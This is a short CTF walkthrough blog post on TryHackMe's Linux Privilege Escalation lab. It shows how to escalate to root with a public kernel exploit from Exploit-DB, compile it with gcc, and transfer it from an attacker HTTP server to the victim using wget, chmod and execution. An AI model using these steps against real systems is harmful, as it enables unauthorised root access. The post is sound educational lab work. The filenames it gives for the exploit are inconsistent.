Series of CTF machines Walkthrough #5 Linux Privilege Escalation using Kernel Exploit.
Hello Hackers, In the last blog we learnt about the different methods of Enumeration, so in this we are going to Exploit the vulnerable “Kernel” version. in TryHackMe there is a amazing learning path called “Linux Privilege Escalation”.
What is Kernel?
Kernel is the heart of the operating system, it provides an interface between the application and the hardware components of the system, it is responsible for doing the tasks like Memory management, Disk management and Task management, etc.
We already have the SSH credentials from TryHackMe, lets use those credentials and login to SSH via terminal.
You can see we logged in to account, and we have user privilege so lets escalate our privilege to root by exploiting the kernel.
So first, lets check the kernel version using “uname -a” cmd and now we have a kernel version number so lets now check for the exploits in Searchsploit, Exploit-DB or Google.
This is the link for the https://www.exploit-db.com/exploits/37292 kernel exploit, download the exploit and compile it using “gcc”
CMD for compile the “37292.c” file “gcc 37291.c -o priv-exploit”.
-o stands for output the file
If you open the file using nano or any file opener you can see the commands to execute the file, if you go down below you can read, how the code is written, the code is written in “C language”.
After compiling the exploit and after analyzing the exploit, Now it’s time to execute.
So we have to export the file to the victim machine, to export we have to open the “local HTTP server” on our (attacker) machine, using the simple command “python3 -m http.server” you can open the HTTP server and now you have to use the “wget” command in victim machine to import the file, the cmd is “wget http://192.168.1.7:8000/priv”.
Before importing the exploit in victim machine make sure that you are in a writable folder or /tmp folder .
After importing the exploit give the executable permissions using “chmod +x priv”. and now execute the file using “./priv” in below image you can see after executing, we got root privileges.
Now change the directory to root privileged user and find the file and submit it.
Next write-up will be on “SUDO”.